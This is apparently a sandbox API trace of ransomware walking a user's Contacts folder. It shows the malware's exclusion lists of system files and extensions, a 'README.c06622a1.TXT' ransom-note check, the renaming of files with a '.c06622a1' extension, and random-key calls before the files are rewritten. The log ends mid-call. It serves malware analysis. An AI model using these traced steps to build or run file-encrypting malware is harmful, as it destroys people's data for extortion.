[0155.493] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.493] wcslen (_String="nls") returned 0x3 [0155.493] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.493] wcslen (_String="nomedia") returned 0x7 [0155.493] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.493] wcslen (_String="ocx") returned 0x3 [0155.493] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.493] wcslen (_String="prf") returned 0x3 [0155.493] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.493] wcslen (_String="ps1") returned 0x3 [0155.493] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.493] wcslen (_String="rom") returned 0x3 [0155.493] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.493] wcslen (_String="rtp") returned 0x3 [0155.493] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.493] wcslen (_String="scr") returned 0x3 [0155.493] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.494] wcslen (_String="shs") returned 0x3 [0155.494] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.494] wcslen (_String="spl") returned 0x3 [0155.494] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.494] wcslen (_String="sys") returned 0x3 [0155.494] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.494] wcslen (_String="theme") returned 0x5 [0155.494] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.494] wcslen (_String="themepack") returned 0x9 [0155.494] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.494] wcslen (_String="wpx") returned 0x3 [0155.494] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.494] wcslen (_String="lock") returned 0x4 [0155.494] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.494] wcslen (_String="key") returned 0x3 [0155.494] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.494] wcslen (_String="hta") returned 0x3 [0155.494] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.494] wcslen (_String="msi") returned 0x3 [0155.494] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.494] wcslen (_String="pdb") returned 0x3 [0155.494] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.494] wcslen (_String="sqlite") returned 0x6 [0155.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.495] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.495] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.495] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.495] wcscpy (in: _Dest=0x321009e, _Source="Administrator.contact" | out: _Dest="Administrator.contact") returned="Administrator.contact" [0155.495] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1 [0155.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0155.495] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.495] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.497] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xbee0725a [0155.497] RtlComputeCrc32 (PartialCrc=0x725a, Buffer=0x32ec24, Length=0x80) returned 0xd9fa272b [0155.497] RtlComputeCrc32 (PartialCrc=0x272b, Buffer=0x32ec24, Length=0x80) returned 0xce2ddbe0 [0155.497] RtlComputeCrc32 (PartialCrc=0xdbe0, Buffer=0x32ec24, Length=0x80) returned 0xd1097d31 [0155.497] RtlComputeCrc32 (PartialCrc=0x7d31, Buffer=0x32ec24, Length=0x80) returned 0x60d9da7b [0155.497] CloseHandle (hObject=0x1b8) returned 1 [0155.497] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.497] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0155.498] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 0x40 [0155.498] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.498] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0155.500] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.501] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x511355b6 [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5dc0190f [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc4ae966 [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x305c27fd [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f662c67 [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f08ad0 [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50eec [0155.509] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xcea79eb [0155.513] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x9657685b [0155.513] RtlComputeCrc32 (PartialCrc=0x685b, Buffer=0x2690094, Length=0x80) returned 0x599eb322 [0155.513] RtlComputeCrc32 (PartialCrc=0xb322, Buffer=0x2690094, Length=0x80) returned 0xebcfbf5c [0155.513] RtlComputeCrc32 (PartialCrc=0xbf5c, Buffer=0x2690094, Length=0x80) returned 0x6b9735b7 [0155.513] RtlComputeCrc32 (PartialCrc=0x35b7, Buffer=0x2690094, Length=0x80) returned 0x76fb4aa3 [0155.513] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.513] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.513] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.513] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0155.513] _wcsicmp (_Str1="asdlfk poopvy.contact", _Str2="README.c06622a1.TXT") returned -17 [0155.513] wcsstr (_Str="asdlfk poopvy.contact", _SubStr="README") returned 0x0 [0155.513] _wcsicmp (_Str1="autorun.inf", _Str2="asdlfk poopvy.contact") returned 2 [0155.513] wcslen (_String="autorun.inf") returned 0xb [0155.513] _wcsicmp (_Str1="boot.ini", _Str2="asdlfk poopvy.contact") returned 1 [0155.513] wcslen (_String="boot.ini") returned 0x8 [0155.513] _wcsicmp (_Str1="bootfont.bin", _Str2="asdlfk poopvy.contact") returned 1 [0155.513] wcslen (_String="bootfont.bin") returned 0xc [0155.513] _wcsicmp (_Str1="bootsect.bak", _Str2="asdlfk poopvy.contact") returned 1 [0155.514] wcslen (_String="bootsect.bak") returned 0xc [0155.514] _wcsicmp (_Str1="desktop.ini", _Str2="asdlfk poopvy.contact") returned 3 [0155.514] wcslen (_String="desktop.ini") returned 0xb [0155.514] _wcsicmp (_Str1="iconcache.db", _Str2="asdlfk poopvy.contact") returned 8 [0155.514] wcslen (_String="iconcache.db") returned 0xc [0155.514] _wcsicmp (_Str1="ntldr", _Str2="asdlfk poopvy.contact") returned 13 [0155.514] wcslen (_String="ntldr") returned 0x5 [0155.514] _wcsicmp (_Str1="ntuser.dat", _Str2="asdlfk poopvy.contact") returned 13 [0155.514] wcslen (_String="ntuser.dat") returned 0xa [0155.514] _wcsicmp (_Str1="ntuser.dat.log", _Str2="asdlfk poopvy.contact") returned 13 [0155.514] wcslen (_String="ntuser.dat.log") returned 0xe [0155.514] _wcsicmp (_Str1="ntuser.ini", _Str2="asdlfk poopvy.contact") returned 13 [0155.514] wcslen (_String="ntuser.ini") returned 0xa [0155.514] _wcsicmp (_Str1="thumbs.db", _Str2="asdlfk poopvy.contact") returned 19 [0155.514] wcslen (_String="thumbs.db") returned 0x9 [0155.514] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.514] wcslen (_String="386") returned 0x3 [0155.514] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.514] wcslen (_String="adv") returned 0x3 [0155.514] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.514] wcslen (_String="ani") returned 0x3 [0155.514] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.514] wcslen (_String="bat") returned 0x3 [0155.514] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.514] wcslen (_String="bin") returned 0x3 [0155.514] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.515] wcslen (_String="cab") returned 0x3 [0155.515] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.515] wcslen (_String="cmd") returned 0x3 [0155.515] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.515] wcslen (_String="com") returned 0x3 [0155.515] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.515] wcslen (_String="cpl") returned 0x3 [0155.515] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.515] wcslen (_String="cur") returned 0x3 [0155.515] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.515] wcslen (_String="deskthemepack") returned 0xd [0155.515] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.515] wcslen (_String="diagcab") returned 0x7 [0155.515] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.515] wcslen (_String="diagcfg") returned 0x7 [0155.515] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.515] wcslen (_String="diagpkg") returned 0x7 [0155.515] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.515] wcslen (_String="dll") returned 0x3 [0155.515] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.515] wcslen (_String="drv") returned 0x3 [0155.515] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.515] wcslen (_String="exe") returned 0x3 [0155.515] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.515] wcslen (_String="hlp") returned 0x3 [0155.515] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.515] wcslen (_String="icl") returned 0x3 [0155.515] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.515] wcslen (_String="icns") returned 0x4 [0155.516] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.516] wcslen (_String="ico") returned 0x3 [0155.516] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.516] wcslen (_String="ics") returned 0x3 [0155.516] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.516] wcslen (_String="idx") returned 0x3 [0155.516] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.516] wcslen (_String="ldf") returned 0x3 [0155.516] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.516] wcslen (_String="lnk") returned 0x3 [0155.516] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.516] wcslen (_String="mod") returned 0x3 [0155.516] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.516] wcslen (_String="mpa") returned 0x3 [0155.516] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.516] wcslen (_String="msc") returned 0x3 [0155.516] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0155.516] wcslen (_String="msp") returned 0x3 [0155.516] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.516] wcslen (_String="msstyles") returned 0x8 [0155.516] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.516] wcslen (_String="msu") returned 0x3 [0155.516] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.516] wcslen (_String="nls") returned 0x3 [0155.516] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.516] wcslen (_String="nomedia") returned 0x7 [0155.516] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.516] wcslen (_String="ocx") returned 0x3 [0155.517] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.517] wcslen (_String="prf") returned 0x3 [0155.517] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.517] wcslen (_String="ps1") returned 0x3 [0155.517] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.517] wcslen (_String="rom") returned 0x3 [0155.517] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.517] wcslen (_String="rtp") returned 0x3 [0155.517] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.517] wcslen (_String="scr") returned 0x3 [0155.517] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.517] wcslen (_String="shs") returned 0x3 [0155.517] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.517] wcslen (_String="spl") returned 0x3 [0155.517] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.517] wcslen (_String="sys") returned 0x3 [0155.517] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.517] wcslen (_String="theme") returned 0x5 [0155.517] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.517] wcslen (_String="themepack") returned 0x9 [0155.517] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.517] wcslen (_String="wpx") returned 0x3 [0155.517] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.517] wcslen (_String="lock") returned 0x4 [0155.517] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.517] wcslen (_String="key") returned 0x3 [0155.517] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.517] wcslen (_String="hta") returned 0x3 [0155.518] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.518] wcslen (_String="msi") returned 0x3 [0155.518] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.518] wcslen (_String="pdb") returned 0x3 [0155.518] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.518] wcslen (_String="sqlite") returned 0x6 [0155.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.518] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.518] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.518] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.518] wcscpy (in: _Dest=0x321009e, _Source="asdlfk poopvy.contact" | out: _Dest="asdlfk poopvy.contact") returned="asdlfk poopvy.contact" [0155.518] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1 [0155.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0155.519] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.519] ReadFile (in: hFile=0x19c, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.529] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x3cba81d0 [0155.529] RtlComputeCrc32 (PartialCrc=0x81d0, Buffer=0x32ec24, Length=0x80) returned 0xfcc5be30 [0155.529] RtlComputeCrc32 (PartialCrc=0xbe30, Buffer=0x32ec24, Length=0x80) returned 0x292e0b8f [0155.529] RtlComputeCrc32 (PartialCrc=0xb8f, Buffer=0x32ec24, Length=0x80) returned 0x2999dd3a [0155.529] RtlComputeCrc32 (PartialCrc=0xdd3a, Buffer=0x32ec24, Length=0x80) returned 0x1b33dbfa [0155.529] CloseHandle (hObject=0x19c) returned 1 [0155.529] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.529] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0155.529] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 0x40 [0155.529] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.529] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0155.533] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.533] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66ef8b32 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27c8b888 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x720c375d [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x767f7736 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7df9e5f6 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55ef34fc [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xff6b3f3 [0155.539] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ca6bc2 [0155.543] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xd65a9e7b [0155.543] RtlComputeCrc32 (PartialCrc=0x9e7b, Buffer=0x710094, Length=0x80) returned 0x37191253 [0155.543] RtlComputeCrc32 (PartialCrc=0x1253, Buffer=0x710094, Length=0x80) returned 0xf113469d [0155.543] RtlComputeCrc32 (PartialCrc=0x469d, Buffer=0x710094, Length=0x80) returned 0x8c8de36c [0155.543] RtlComputeCrc32 (PartialCrc=0xe36c, Buffer=0x710094, Length=0x80) returned 0x94335dd5 [0155.543] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.543] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.543] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.543] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0155.543] _wcsicmp (_Str1="chucu jadnvk.contact", _Str2="README.c06622a1.TXT") returned -15 [0155.543] wcsstr (_Str="chucu jadnvk.contact", _SubStr="README") returned 0x0 [0155.543] _wcsicmp (_Str1="autorun.inf", _Str2="chucu jadnvk.contact") returned -2 [0155.543] wcslen (_String="autorun.inf") returned 0xb [0155.543] _wcsicmp (_Str1="boot.ini", _Str2="chucu jadnvk.contact") returned -1 [0155.543] wcslen (_String="boot.ini") returned 0x8 [0155.543] _wcsicmp (_Str1="bootfont.bin", _Str2="chucu jadnvk.contact") returned -1 [0155.543] wcslen (_String="bootfont.bin") returned 0xc [0155.544] _wcsicmp (_Str1="bootsect.bak", _Str2="chucu jadnvk.contact") returned -1 [0155.544] wcslen (_String="bootsect.bak") returned 0xc [0155.544] _wcsicmp (_Str1="desktop.ini", _Str2="chucu jadnvk.contact") returned 1 [0155.544] wcslen (_String="desktop.ini") returned 0xb [0155.544] _wcsicmp (_Str1="iconcache.db", _Str2="chucu jadnvk.contact") returned 6 [0155.544] wcslen (_String="iconcache.db") returned 0xc [0155.544] _wcsicmp (_Str1="ntldr", _Str2="chucu jadnvk.contact") returned 11 [0155.544] wcslen (_String="ntldr") returned 0x5 [0155.544] _wcsicmp (_Str1="ntuser.dat", _Str2="chucu jadnvk.contact") returned 11 [0155.544] wcslen (_String="ntuser.dat") returned 0xa [0155.544] _wcsicmp (_Str1="ntuser.dat.log", _Str2="chucu jadnvk.contact") returned 11 [0155.544] wcslen (_String="ntuser.dat.log") returned 0xe [0155.544] _wcsicmp (_Str1="ntuser.ini", _Str2="chucu jadnvk.contact") returned 11 [0155.544] wcslen (_String="ntuser.ini") returned 0xa [0155.544] _wcsicmp (_Str1="thumbs.db", _Str2="chucu jadnvk.contact") returned 17 [0155.544] wcslen (_String="thumbs.db") returned 0x9 [0155.544] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.544] wcslen (_String="386") returned 0x3 [0155.544] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.544] wcslen (_String="adv") returned 0x3 [0155.544] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.544] wcslen (_String="ani") returned 0x3 [0155.544] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.544] wcslen (_String="bat") returned 0x3 [0155.544] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.544] wcslen (_String="bin") returned 0x3 [0155.544] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.545] wcslen (_String="cab") returned 0x3 [0155.545] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.545] wcslen (_String="cmd") returned 0x3 [0155.545] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.545] wcslen (_String="com") returned 0x3 [0155.545] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.545] wcslen (_String="cpl") returned 0x3 [0155.545] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.545] wcslen (_String="cur") returned 0x3 [0155.545] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.545] wcslen (_String="deskthemepack") returned 0xd [0155.545] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.545] wcslen (_String="diagcab") returned 0x7 [0155.545] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.545] wcslen (_String="diagcfg") returned 0x7 [0155.545] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.545] wcslen (_String="diagpkg") returned 0x7 [0155.545] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.545] wcslen (_String="dll") returned 0x3 [0155.545] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.545] wcslen (_String="drv") returned 0x3 [0155.545] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.545] wcslen (_String="exe") returned 0x3 [0155.545] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.545] wcslen (_String="hlp") returned 0x3 [0155.545] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.545] wcslen (_String="icl") returned 0x3 [0155.545] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.546] wcslen (_String="icns") returned 0x4 [0155.546] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.546] wcslen (_String="ico") returned 0x3 [0155.546] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.546] wcslen (_String="ics") returned 0x3 [0155.546] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.546] wcslen (_String="idx") returned 0x3 [0155.546] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.546] wcslen (_String="ldf") returned 0x3 [0155.546] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.546] wcslen (_String="lnk") returned 0x3 [0155.546] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.546] wcslen (_String="mod") returned 0x3 [0155.546] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.546] wcslen (_String="mpa") returned 0x3 [0155.546] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.546] wcslen (_String="msc") returned 0x3 [0155.546] _wcsicmp (_Str1="msp", 